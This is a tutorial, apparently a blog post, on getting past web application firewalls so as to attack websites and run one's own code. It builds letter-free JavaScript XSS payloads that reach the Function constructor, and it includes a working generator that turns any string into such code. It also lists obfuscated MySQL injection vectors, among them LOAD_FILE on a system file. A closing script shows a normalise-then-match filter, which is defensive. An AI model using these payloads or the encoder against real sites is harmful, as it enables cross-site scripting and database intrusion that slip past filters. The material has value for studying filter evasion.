Hey folks, today I will show you how to bypass a Web Application Firewall (WAF) to attack websites and get your own code executed.
What are WAFs?
1. Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
2. Usually contain a lot of complex regexp rules to match
3. Support special features like cookie encryption, CSRF protection, etc.
4. Apart from the free mod_security they are quite expensive (and there is often no correlation between the price and their filtering capabilities)
WAF filter rules
1. Directly reflect WAF effectiveness
2. For most WAF vendors they are closely guarded secrets, yet determined attackers are able to bypass them without ever seeing the actual rules
3. Open-source WAFs (mod_security, PHPIDS) have open-source rules, which allows more scrutiny by skilled penetration testers
Obfuscation tools you need
Hackvertor
HackBar
Malzilla
Your imagination :)
Let's bypass the WAF!
Example situation: the WAF blocks alphabetic characters and digits (probably not a very realistic situation, just a proof of concept :)
XSS obfuscation
Allowed: only a few special characters (){}_=[];$"!+<>
Generating numbers
+[] //0
++[[]][+[]] //1
+!+[] //1
++[++[[]][+[]]][+[]] //2
!+[]+!+[] //2
++[++[++[[]][+[]]][+[]]][+[]] //3
!+[]+!+[]+!+[] //3
Generating the string 'alert' without using any alphanumeric characters
Let's start with 'a'
Which JavaScript value contains 'a'? We can use NaN (Not a Number).
Index the empty array with 0 (gives undefined) and convert that to a number (NaN):
+[][+[]] // result: NaN
Generating the 'a' character
'NaN'[1] is 'a'
++[[]][+[]] //1
+[][+[]]+[] // result: string "NaN" (adding [] converts the number to a string)
(+[][+[]]+[])[++[[]][+[]]] //a
Generating the 'l' character
Use boolean false
We can use the ! (NOT) operator
e.g. ''==0 //true
Apply ! to an empty array to obtain a boolean, wrap it in [] and add [] to convert it to a string:
([![]]+[]) //string "false"
++[++[[]][+[]]][+[]] //2
'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'
Generating the 'e' character
It's easy, we can use boolean true
([!![]]+[]) // string 'true'
++[++[++[[]][+[]]][+[]]][+[]] //3
'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //e
Generating the 'r' character
Again from boolean true
([!![]]+[]) // string 'true'
++[[]][+[]] //1
'true'[1] = ([!![]]+[])[++[[]][+[]]] //r
Generating the 't' character
Again from boolean true
([!![]]+[]) // string 'true'
+[] //0
'true'[0] = ([!![]]+[])[+[]] //t
And now we have the 'alert' string!
(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] //string 'alert'
How to execute the code of our choice?
We need to get hold of the window object to reach all of its properties
If you can reach a constructor, you can reach the Function constructor and execute arbitrary code
The shortest way to get window in the engines of the time (pre-ES5 behaviour) was:
alert((1,[].sort)()) // shows the window object!
The comma operator strips the receiver, so sort() runs with an undefined this, which non-strict code in those engines replaced with the global object. Current engines throw a TypeError here ("Array.prototype.sort called on null or undefined"), so use the constructor chain below instead.
How to call any arbitrary JavaScript function
Using the array constructor (accessing the constructor twice from an array object returns Function):
[].constructor.constructor("alert(1)")()
To spell 'constructor' we still need the letters 'c', 'n', 'u' (as well as 'o' and 's'); take them from the string form of [].sort:
function sort() { [native code] }
([].sort+[])[3] is 'c', [1] is 'u', [2] is 'n' and [6] is 'o'; 's' is 'false'[3]. Since spelling 'sort' itself already needs an 'o', ([]+{}) (the string "[object Object]") gives one at index 1.
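The steps above (numbers from +[] and !+[], letters indexed out of "NaN", "false", "true" and friends, then Function via two constructor hops) generalise to any string. The generator below is an added example written for this page, not code from the original post or from the tools it lists; the source strings it uses, including "undefined" from [][[]] and "[object Object]" from []+{}, are my choice, and it needs only Node.js.

```javascript
// Added example, not from the original post: turn a word into JavaScript that
// contains no letters or digits, using the post's building blocks.

// Expression that evaluates to the number n (n >= 0).
function numberExpr(n) {
  if (n === 0) return "+[]";               // +[]      -> 0
  if (n === 1) return "+!+[]";             // +true    -> 1
  return Array(n).fill("!+[]").join("+");  // true+true+... -> n
}

// Expressions that evaluate to strings we can index characters out of.
const SOURCES = [
  "(+[][+[]]+[])",   // "NaN"             (+undefined is NaN, +[] stringifies it)
  "([![]]+[])",      // "false"
  "([!![]]+[])",     // "true"
  "([][[]]+[])",     // "undefined"       ([][""] is undefined)
  "([]+{})",         // "[object Object]" (supplies o, b, j, c)
];

// Build a char -> expression table once. Each entry is SOURCE[index], where
// the index is itself a non-alphanumeric number expression.
const CHAR_TABLE = (() => {
  const table = {};
  for (const src of SOURCES) {
    const value = eval(src);  // constant, trusted input
    for (let i = 0; i < value.length; i++) {
      const ch = value[i];
      if (/[A-Za-z]/.test(ch) && !(ch in table)) {
        table[ch] = src + "[" + numberExpr(i) + "]";
      }
    }
  }
  return table;
})();

// Encode a string as a concatenation of non-alphanumeric expressions. Letters
// come from CHAR_TABLE, digits from numberExpr(d)+[], everything else stays a
// quoted literal (quotes and punctuation are allowed in the post's scenario).
function encodeString(s) {
  const parts = [];
  for (const ch of s) {
    if (/[0-9]/.test(ch)) {
      parts.push("(" + numberExpr(Number(ch)) + "+[])");
    } else if (/[A-Za-z]/.test(ch)) {
      if (!(ch in CHAR_TABLE)) throw new Error("no source for " + JSON.stringify(ch));
      parts.push(CHAR_TABLE[ch]);
    } else {
      parts.push(JSON.stringify(ch));
    }
  }
  return parts.join("+");
}

// [][ctor][ctor] is Function; build Function(body)() without any letters.
function functionCallExpr(body) {
  const ctor = encodeString("constructor");
  return "[][" + ctor + "][" + ctor + "](" + encodeString(body) + ")()";
}

function isAlphanumericFree(expr) {
  return !/[A-Za-z0-9]/.test(expr);
}

console.log(encodeString("alert"));
console.log(functionCallExpr("alert(1)"));
```

The output for "alert" is a different expression from the one hand-built above (it uses !+[]+!+[] rather than ++[...] for the indexes), but it evaluates to the same string; functionCallExpr produces the letter-free equivalent of [].constructor.constructor("alert(1)")().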
SQL obfuscation
What is obfuscation of an SQL injection vector?
Different DBMS have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representations, escaping, and hashing functions (MD5, SHA1)
Many "blacklisted" characters can be replaced by functional alternatives (e.g. in MySQL the byte 0xA0 is accepted as whitespace)
Obfuscated comments: it is difficult to determine what is a comment and what is not
SQL obfuscation examples
SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))
(the hex literal is 'pass' and the binary literal is 'word', so the query yields 'password')
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
(comments split and nested so that a regex-based filter and the DBMS parser may disagree about where each comment ends)
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
(0x633A5C626F6F742E696E69 is the hex form of c:\boot.ini; (M) marks MySQL)
SELECT(extractvalue(0x3C613E61646D696E3C2F613E, 0x2F61))
(the hex literals are '<a>admin</a>' and the XPath '/a'; note that no whitespace is needed after SELECT)
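Why these encodings get past a blacklist, and what a filter has to do about it: the rule is applied to the raw request, while the DBMS sees the decoded form. The normaliser below is an added example for this page, not code from the original post or from any WAF product; it decodes the MySQL representations listed above (0x... and x'...' hex, b'...' binary, /* */ comments, 0xA0 as whitespace) and runs the same keyword rule before and after. The rule and the sample payloads are constructed for the example; the literal ones mirror the queries above.

```javascript
// Added example, not from the original post: normalise-then-match versus
// matching the raw request, for the MySQL encodings discussed above.

// A raw-text rule of the kind blacklist WAFs ship: the keyword followed by
// ASCII whitespace (PCRE \s without Unicode mode does not match byte 0xA0).
const NAIVE_RULE = /\bselect[ \t\r\n]+/i;

// 0x633A5C... or x'633A5C...' -> "c:\..."
function hexToString(hex) {
  if (hex.length % 2) hex = "0" + hex;  // MySQL pads an odd-length literal with a leading 0
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// b'1110111...' -> "word"; bits are right-aligned, so pad on the left to whole bytes
function binToString(bits) {
  const padded = bits.padStart(Math.ceil(bits.length / 8) * 8, "0");
  let out = "";
  for (let i = 0; i < padded.length; i += 8) {
    out += String.fromCharCode(parseInt(padded.substr(i, 8), 2));
  }
  return out;
}

function quote(s) {
  return "'" + s.replace(/'/g, "''") + "'";
}

// Rewrite the statement into the form the DBMS effectively parses, so that a
// keyword rule sees decoded literals and real separators.
function normalizeMySql(sql) {
  return sql
    .replace(/\/\*[\s\S]*?\*\//g, " ")                          // a comment acts as a separator
    .replace(/\b0x([0-9a-f]+)\b/gi, (_, h) => quote(hexToString(h)))
    .replace(/\bx'([0-9a-f]+)'/gi, (_, h) => quote(hexToString(h)))
    .replace(/\bb'([01]+)'/gi, (_, b) => quote(binToString(b)))
    .replace(/\u00a0/g, " ")                                     // 0xA0 accepted as whitespace by MySQL
    .replace(/\s+/g, " ")
    .trim();
}

// What the raw rule and the normalise-then-match rule each see.
function inspect(sql) {
  const normalized = normalizeMySql(sql);
  return {
    normalized,
    rawHit: NAIVE_RULE.test(sql),
    normalizedHit: NAIVE_RULE.test(normalized),
  };
}

// Constructed sample payloads for this example.
const SAMPLES = [
  "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
  "SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))",
  "SELECT/**/1",
  "SELECT\u00a0password\u00a0FROM\u00a0users",
  "SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2F61))",
];

for (const s of SAMPLES) console.log(inspect(s));
```

Two things to take from the run: SELECT/**/1 and the 0xA0-separated query are missed on the raw text and caught after normalisation, while SELECT(extractvalue(...)) is missed in both cases, because the rule insists on whitespace after the keyword. Decoding closes the encoding gap; a rule written around the attacker's expected formatting is still a rule that formatting can beat.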
How To Bypass Modern WAFs: 2014